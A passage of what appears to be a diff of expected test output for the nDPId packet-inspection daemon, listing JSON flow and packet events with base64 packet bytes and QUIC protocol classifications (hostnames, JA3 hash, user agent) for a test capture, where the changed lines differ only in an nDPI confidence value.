SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432907578,"flow_last_seen":1621432907578,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432907578,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"98.251.203.81","src_port":43427,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"optimizationguide-pa.googleapis.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432925103,"flow_last_seen":1621432925103,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432925103,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"171.182.169.23","src_port":54692,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1621432925103,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621432925103,"pkt":"AAAAAAAAAAcAGj1jCABFAAViSZ9AAEAR2GnAqP4Lq7apF9WkAbsFTr9ryP8AAB0ImNfkZtNfpzsAAEU0Oj9RSuVXGBshDZ9GPJVbTKah5lq0FbzrD\/4QiXWxZYgS+EbUjCGL\/0WPsAmbxAc5pHPcwM09LAtmsRF0tGX2IcJO0mU4AICaJurVtqH6l7QnkS2mp\/1x4GkbuWDqNzt1vSNWb0duDucAhmzcDliKJUl+FhynNOZYpa37\/x3qQ2gUckEGtff22WZgICjdslGI9otsFCSq641M3T\/cnDTUDnywq\/5JBllUmTz3xSy7uOqdk\/GvmAxiKHI2qstlN50jgygWTjcEwibzi9GX45hbp55CvW6Vq07\/s78mWZPUaJolO7wmVEZvMjkKJwShrqatA1+fXdYi3Cg6UroeArW9\/giXBCgKk96t0LWj0Ye3aYHEguEIQQk+U1hIhhohBG7CyRY7KinfzxhHKYp4nxR0AoE08flCIJk27BdQVKCtwgdl1KEE6InkS58vcYsqRwl5mGQOqcdrW5vFut3SDANgBea80xgfodgrDqKTbcyZffoEiF+kb9ynHc1ezv0bIAV1
PkzOj2qgqWsC5p\/fh\/Zzo8P2XZ8aLnTStcZ6bcklAv5uVNf+UFbiWmjv2tlpO14A6WkHj4ErxqRWGBEYotaldzMPFZWFiW2ioPVB0TG8QGhc95U+YN9bqrlIpzSi25dwaSTySv9VHstq4bM\/QvcvcMc0fH6fkzreAswa30NHgKmTHo6vyNHpVpxUy9B4ic+Or+cxEht9\/+WUAlkGWn97Q8YWdYVqIOE5mCXUm8qnxVNMIjkIhZGSoo3YxRavD7wdS8Fw1e+q3qydgTwhWjN0NEBx48heIuNQeY\/cE2hG6X8ielA1D3F3K53XZj+sSIoJGcY1F7o1jjWVmH8mOKr2btDy1dXnct+R\/pl4MyRkLClPx\/3ATniC4oYp8uNJ3B+NZdFcYjik5Sgeyx0mQaYCG27z65uob1zsx3rLGilfcXu8rawpdMaheJzkzO8EfJ0bPQG7F16gqR72nPqhJazpLH1wJnmzKMRebRRXMjGts\/Ri1mopASMG\/jbemX2+HOVqkYrPOJB4f5ST2JWfYMS9SdThVwfLGD1AwfsTLiumDKXR4Tg9xxWgAm+qvsbkRhOZ+FGfeL1PYau3Gyz7MiuqmvjBLY1U2K2xhSPscA4eL02HE+xDEr9eGwsucUqbbX+fy7xw+w59I9WXHzL9SjWsk7akH4tDqV3vDDFTrKT11Jy1Do1G\/mkcndHjXnmmMLfPsi8aPVfXNZIsbgrEqHINxT2H5oY4DI9on9u1XyO+WEYlRBbCj0\/iK09jSPGirK8Q36Lbin8pAshKEXfyzFJHclT4mOY4c7REOe77o1hD3cLQLCZ3KJ7lzwhO1fZz\/+5qiqK9KNuq+3D1\/Fbs5GLW+FqzDspdA+DHD3HVyqhGJSXI53Ms9iSliE6F6FFbgCwH3eJT9Ox0wN1zEmBqIR7303kSG5qzr5TLI3S+HsomuNljUiJcLhPennjdx7lzykZLApkNqdXohn6cMLNWawEq2vbg6QuuGD5qyFkpNZTZlU8uAHtpVJ6PR8rOhIURj1C7nmD2CZtZldkk7jy284c\/v0cTFyeXTlazrNC5FguNM8mQtfcjJeoRBgpM91eZLLODlcjL1P9tpCLmn9Socs7Q01T2rkvjPV0716n64nRa49vunAqoY5G0f+iJstXQKjrKL1O19hveBusaLAMf3k7esjVnHjtEFlZNWENT0AHE9vZ45PqMxHl97AMxGE1Ey++DiK2nswhT1oOP5K+MSP8LTUT8gmGcQuDngWuHVMtTenYrRPM5"} -00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432925103,"flow_last_seen":1621432925103,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432925103,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"171.182.169.23","src_port":54692,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"www.freearabianporn.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432925103,"flow_last_seen":1621432925103,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432925103,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"171.182.169.23","src_port":54692,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.freearabianporn.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433005013,"flow_last_seen":1621433005013,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433005013,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"168.78.153.39","src_port":35124,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1621433005013,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433005013,"pkt":"AAAAAAAAAAcAsxf\/CABFAAVil6tAAEARnbXAqP4LqE6ZJ4k0AbsFThpVwP8AAB0IZRm3OuXdodgAAEU0ssTnI2C5JTpJ7y484Fn11oOKDy1JlfEyAX6Ahkv2Zo4OuAkEIohPGoaBHToYLM+P+WJUX+\/Cx7tkDHSXu6uphHZEOGBHmbdUhEa31U3TrNufu9mq6Qj3es8x44mT60\/f25coknN4f1asGblw6iEV1UtSpKMZaOs\/Xn05i9jEBkmhLNqDiktkJ4wwKu6eDxhG6VfLGYQN0Nd18mF97QnMWVWto+p42IfXZbxYSsRmanu+ilVlO+oFCT5a\/R9Dt+6n3rqrFuIxLqTN6rjt10GoO\/\/lvMLrXeyHTYVfDmtLHFSomxcrpQ3r6eIc\/i4bL2wJjBHSTqeCFHn34cWF\/KUdra327rirXnBA\/7qtlzjYwUqqXpMeU06gm6+dAJeS+a55i\/iSqTqtrz20+u7ZIKLbJOhNJP6eJyDr4dCdENdXp1Fo+RvNoazaCsibyYSNV21GcFTzdJdaAp+DcgmVuOqynNS+9YRbKxw\/5tALw7bDdUy189V3QJUm\/7eodDeLzAxTU0ecTeCtBoRV6Wg00hEmo77VajiQh+S9i4nbzRbAGk3ddKNqZC3nSakSP6Mm39WZ9XZ2DSCUBtbOz1EnZK6eDSyw3kFY8N3QSNiaiSeJfa33Sokfyq3JCk8UnjuMqQyCqe2oeMj9pjHd8z5tFKOU+7OZzkA\/yQ7JVv9cFs9+5eYZ4cKFz9UVTSQT0XDPHR4RXhdh+bwJsc9s3QG7laDs6sjDff1OOdIw+HQvW4J9j4BHeEjv5EX8iWWHhElmMuawXMu41RoYajwI8TvfiJwokixmW4yjJof50jF95ax2qGzCJFu+R9a+5BttXBh\/HgnlXdP0TqNiuxyOJzh2lYvo4XC+o1iVVoZbKKo29cl1g0ROFSenQ6plougEal5XbLsvgz1yDGwthS+cZxXIzwxF8Eg5YJQAhTRX61XoObnpc3wjyuzhjohKkihqglhF+YzQsZk375xH7l8SvAlGAlhbaqyzvg5BgzZRh6okkrQOneu5ObvEyajk7xJ1B4hskZiOxnZ0noPwZBTF2QPMuYYm+MCxH46tot+xZ66piECmxmki024ptldWuOatYmRe+vTjmyyX1YPL4JCVDC40p742+pLSe\/iwjJkZAnjQmTnvKGie\/1BU5Wr+49RbkkhlQj87GarVPAL2uWWkqFe2Xngd1FbJvcDFFkuK1dxqsHpPZkmRC96zjmBFDteeGuqwR2lMo3UjjF2OCNSmVipO+iUOCkltuf8TJWxs7tEHUrqAVXcOfh5I8BPOIikZ3dfkJLmZ2FbI0TTtjsGhNskYmpIQ0PlvPIV7kAS3z0gwBKaF1FnV\/xQ0OCEM7TJqhVOfiW\/+wkoA3mujBfVH\/wOmSvWqW48vFIffH3djYRV7X32psbHY61g0HRIXjeXvXr8Qqc6kOM7tKBgVpXPFeJ07yr5RtFibyMmbpJubKIOxOd2PNf\/UyTLqOCr\/EZQqRA34kT
\/VbsSrwcgR6YhLifHRelRWGH\/E0Pa9ov+0yS6KH5C1eU4IuTLa8OWBrTOYGLQu8Tu0ZuJyhcfyGs1ESpNH7K8z9wJSLmfAfovUdPKdJaXA4eVpJ3b6rEyriccdcLge1eKHdQyp3T\/AsTnrrAUQoHmrYyzAM8GsuQbvKlbfByymbHOPuwfI9YUmrFGuBKrB3X9vWARNEbMs2uicMz1oh0SQfb2Ug93LkY\/XDhxl6y6ruCuCMjHk9YF6+XgKvBLgShKGnzgcDJqqw32S355No+iSbZZxAos\/DatV1Zsga3TJckyQKORE"} -00924{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433005013,"flow_last_seen":1621433005013,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433005013,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"168.78.153.39","src_port":35124,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"s-img.adskeeper.co.uk","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00924{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433005013,"flow_last_seen":1621433005013,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433005013,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"168.78.153.39","src_port":35124,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"s-img.adskeeper.co.uk","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1621433005304,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433005304,"pkt":"AAAAAAAAAAcAsxf\/CABFAAVil6xAAEARnbTAqP4LqE6ZJ4k0AbsFTtY8xP8AAB0IZRm3OuXdodgAAEU0cISfGNFL6Nfe8IXrcMcB0WwE+45y84o5jFkQ+EdHDqq0hRKmpjiqPPzi8JXkbGCFDae5uvRs2ByaSWejf137f0JY1fl3AeVjkq6PaQWDhduni\/8xLvtEbqFj4AqrhXB9TLrxV5LvP+0mGlJValwLeXYCkQ1e94uqm\/qbFL9zYlqDWYM9BIIViTH9xhJud\/SLw5JuUvIFaOQAu8OmZpUxq1bUd8xSmpOSKiHypmGgb39a7H+T1KVpPR+aUixKS4GeMMK2PAyd+OEGJMuz6qZJGatj+7v0DncaR5EgoSYycOF\/vja\/rdaJ\/YdRvp+BmrQNiM9k5UwjpTPFz+b8892Qzvimnfslx7R8GKQ9PAsv\/Tg24GHiB5jPl\/cYxqB7qj\/Z4RDwUJUIkT1A6um69Kq3NVgu5rAWDw3wRgcQ30gaG3co1yGCHL7BlNpgYFxtc2sG95hPofeQcZ7RmqBI8vbZsdcgEG9pwZXnghf+i9JkdOOyHhmNzU7FhBVpm886Oc7ESE5xd3wpyFyKJ5wKdEwsRtMCPYdLRf0ABAJjDpcG31xcGIVXa+iXmHdKqZaaFXdkzl+G5GyXaENB\/bBYFVR+uzivE3jfVyYnP5o6mkMgHmF4stkzuFXNhTUCQtT+vOWJOY0OKBIRfSRrLMayp1BWBk48bLyItA0l5w22EpO2xW\/My4wjTeC8gEVd09+5dNMt6iJUTON1ZAqvZHzSmdehef4+4mQl\/8x7+EsRKAIMAJ0j+\/iccKVsAFRvylLUI9xTbdrbwMgSdNlLvjtGyuPM+WW8Sz0Fphz5qliTbHpDUhw2MYDjzqo8p1eq2A8b9Wtx0Fg9PeEdOHEHN6JR93qNQ8Qm\/Zs+yaxclMgzfrz0njPpBZWm5TuoqFpmRrNgNmlZsI4vJE5izzoxbqOc+XwyaqSy74943ljvUMQ\/ZeoktJ4guJVMIv881KZyYNXdWP8XlvelQTRxmIHmrk8WULu5C89ykKYnsXobDBaYsX50pAVggD11aUXtJrh1N\/dVOKdnYucGb7Q5ArZbw6g65fAovdJY61FZZYMTsGeir2LCxh1AxApj3NMBJNeCfN35DoXwcNt+D8w2\/aSTQe6Lgqdlrl17h5TVhrBdY2EwKzbkiScpw58VyUeZdOFiVtIYClAYFglMWlD3NA05mjWkzv1JdL5VrS3h3MfI2xs4zN3+TLmvqItkAlOxTuNKnFQ6PMzhbtiE9pIRBeo7GRWe\/s3sXYSAgTQM
eTwcALlYXW1XrTrXea37yWgn6qd6pcye8lKgZfbrjRMCVrOgARQ5+uLTdXLZffiqEHvPYwWFKcJtCjG2DNK7rUYqQnnhv4Wl7a9aDSnxFpvuZBqMtbV6dwRwh3nVBQCEW8tbmselh+vdecmFi+9yIQLpr\/ttp2HjIMzaof+HymOhd7VNiP61ZWKFd35OLow7F6RAlIa\/iMODRCCPy5rCPJ8Och0DWA\/AImeyu3i34G1KgGADjIpQoQOwOKh1KxRKIqPxHA83lNc0T2MvGmebHLNWLrdwsMvVJ+OOdOddVjrpUtFqYOdTOSyKkfGy+z3ggq11AbCjGSCRIXFWOTVgFonh1\/ejWrgnzhzvTVkzsdfazaZm1Nq7y3TI1Ff7GWqkisOa2duQbw0SwQHSDsh9Bynr6GVmyLYxcmpSTtCvxHuQF4wCoYZxuD709QVdI5mDD3SUUMavLX5H44VXuJkLmJC1t\/WhlhpH2ChjFQT1wbqIPa1XxtXfyl+1hhcd+xzhaw9Y6FS3fdwXN19AFoGQ"} -00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":54,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432793457,"flow_last_seen":1621432793457,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433005304,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"152.128.87.238","src_port":50073,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":54,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432793457,"flow_last_seen":1621432793457,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433005304,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"152.128.87.238","src_port":50073,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433067725,"flow_last_seen":1621433067725,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433067725,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"117.148.117.30","src_port":51075,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02319{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1621433067725,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433067725,"pkt":"AAAAAAAAAAcA4umACABFAAVi1OtAAEARtzjAqP4LdZR1HseDAbsFTtZ3zP8AAB0IpPhj4m4ZUDEAAEU0Bbm2MdfcBkbBAPPSjVV7TSr2o29Fu0JZdgmdGfjVEVdDmbG+dqC+JAbzKNxQpRoBCsz4rRvvwiop1np5APZ9Ov1gMJcSIiHQncQkBtDWz+J2o6GAqwAVkZk1FxBkffl8czPnYy8dHsU5KXYYOyBtpfhC+IT7ePszMtE7GlrZvCnH23HBzZ7GxSIxR9YFrG6h4PldhiWirrW6fHFgo\/piSndGDtWSJ+EYJdFyOMLk8LdIhNJ\/bJX3nYw329gRY5r\/poWNl5g71rBp4iz\/aiTDNDMAfcg1ExHdPviw2IK9f4W8pMDMvDI9FexzuJfBX9eRklkzssGGPyOnF+xE6997bLBbI4Vi9+gpQBFCCwYHdZ8Yt0Gussz\/f9ErkfzoPii85d0vfFh+DB5q2D4txvr1h4E4SDVIPFbk3TFJy\/7UXDNbvXXIm5xIqlq3grZZAsNicHGKes2+rw5ypULifO33QhqTPaSFb\/jQn6NyP3WJTRP9i0U0VPYsdYu3f0K5pfJOPF\/8gAxIuhKlFGtGv9GRMlzIpV1F1p2d9+\/vUuadZOiX\/Db7H96lha\/Okr2QtWcz\/SSoJEkbKYVqBS3RDAbbB4X6mN4n9Ft6hAcQJheC2GFXuEAFotpEq4XY1B+2WcU1cIEKgkoBaRv5g1\/LOKnYzLT8SzL1UVFovVGYHn+X0THvNtuJ957AYrKYcqgN\/SUJSPHzmoZoWGO\/q5y19X4WfC481zRO79sZO31h6Dk1na9B\/hYqG\/CxAXd1s5xBzD
A8OS5TnaqusIzCxer4zV82fnF7VoQtDopVZNTsoDAIpt6cW+fAinlqYRRovLmToeikcLMo8c8\/6+0XN4C\/sNxwObVZ\/O5C\/emTkAyuRrduScc9vJaxAO9Dl74qqMHIMLFex8KQIDCh6G1NTs3194S8k5vVSQvmLDPRNPbXzBD1\/e\/+7+rmJqGUOcdbTOlX0fkuR4DB14HEvju2C2b9RxC4VpxeWcvtcIqUvnsdf+10RtMvVEY1H8oIRhd\/40\/JOM1RwnJAya+YM9Lojxag2aYSWUlQyopt5V+r8YPszgD2PyRsBJhXDMRUFIuIv2\/u0jmGfN1IMWtAf4wKiwoSQdAMV17hTocy61LlAkDEtIzfOpKoBNjr1FJvgoLlUR3p6HPRjORhAJzdHC7IByfP3Hxhs3ctG3V\/7BQQoSKFTrGH3kjhrfgHIt0HEkl96gVcUPsmn4EtE2VI+GcXfV\/ANkKoUFr3NCaUGtMncqVP\/YjZZJ+QcMW41L0RZUgzIT928lTjcFEypXkCRrlGtP+rWWXE7mFYXiNfnrIK3QAi4gD88L8LjTWDuvcPu8biICw9pEbLTHY1O7PpcQj\/JJ82HVYLYO58O++NchQ\/rgmiClydF0i\/JID1L1diJjMl1iYMV77lfb9Nvv2HfL8j7cDz55Alfw6pwUDnb8QeDwc\/a6xAfyz4uojy4vrCkJfYZreW9P4NFSgKnEX7HwNb6i1ZjiVei7dVFeH9afC69DsshYJ7L0fYFE5rREPVfqmcWx57T\/mQmdAf1+07k2CuNu6sNtY+XS6xOdLTWbSkcX50J5GTkvJhnKHxtmGLG8CoEfmdvM4NCU9jEGSExH87\/iWlXlfjYuUfmvFjsKZOzqUkQ2sUkhZw7BFVNd3HF7fUsilfRlk2t8MaAx\/EEndDgdYNK0EgdXbFzOIIeK6IAbpmYeX7gNdesbdzVQ6uz6TCcVrRcKuxoreJi193vTD2D8+SLe1fOItmTtr9WoqXkb1GjhybS\/sPn+TL"} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433067725,"flow_last_seen":1621433067725,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433067725,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"117.148.117.30","src_port":51075,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"pagead2.googlesyndication.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 
+00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433067725,"flow_last_seen":1621433067725,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433067725,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"117.148.117.30","src_port":51075,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"pagead2.googlesyndication.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; SM-A125F","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433067996,"flow_last_seen":1621433067996,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433067996,"l3_proto":"ip4","src_ip":"192.168.254.11","dst_ip":"87.179.155.149","src_port":49689,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1621433067996,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433067996,"pkt":"AAAAAAAAAAcAWlu1CABFAAVi1TJAAEARrlvAqP4LV7OblcIZAbsFTjBdyP8AAB0IGttMWxhOAgQAAEU0E0iR2uQV7+gKMUMCJ94a1mUs9WxU6Tkmya1QT1ijZpDLW3h0qsyJnE7yi5XMKbMLZQG0VI0E4CnL4699UzuXHbmZG4j1bpQxuVn5yALot0dTMdquwfkg43GEM1wkpQgrsMTP0qTEcaLbJ4i4VFKwOqxnROj3ts8Q5YEHHDel6ycIKIRhevOZCj2WbWLu59h+nwbW8hRv73Od8cN4+kjzfuGe+B1zZiO+ZdX3XLy2RMy5S4kzUgTJnM6eihuCfOyH9C1kMvBrE6eF+uvUY6g2SL73pAnMQ8F3ZxMjAvnHhyJJDNucS6II1cpdPCb4Nk6lW166dZJrTlpxEptf9MOeoGPoI7T8kuqmrwllZaRI4XQ\/kKSxUPBWGaQQMJydqLl6\/T1lDk6eOI6jqnm\/GdP90hCcoCmDPrWgZe22++LHPGXmbsr3YOCDa1nIhq8ftKY33OkoptIbA8RVngOr1lQUcMQQ\/VYFKWd7j8gKOuzuJU4SGqvnkK6Wj6e+C85olkBIqr+FP9UVpBEPptprLjMH\/pqncDJZ5yEh7Grdurgenn8Oa1UCeREsY9XCcMK5LJG0GEGg5FgT1KKRue2Z3g1vuP3LjKlHlZ6ysoHZipHIwWeDZcFGaN8c7Ipp75Aj4UWNvtREE2z3pxKUeu\/3ZyZ1sgWETUpVlXcSVvotMQ5TZwvAGbXANNu\/rhz1tvjUpV2Gbr3iMVknJ312hfpRnkJ0phBBW7yPgZMi2pP2LGIwP70mvVJhdiKKMoWgQ2K6uSPzHShiYyWZ9wfqSuCt4GrPH2Dz+sYRk9GjWlWo38XlQSZByhfvHyMDGY\/VwkRy7DGiQWpLBPaI32qcs+0Wi5UhL0chKc9MuYtE2kBrFhu\/MmzxgILiKu9g1WiLecrRs+SiPafnawwXaxRH3UnKyKEbs9tf7c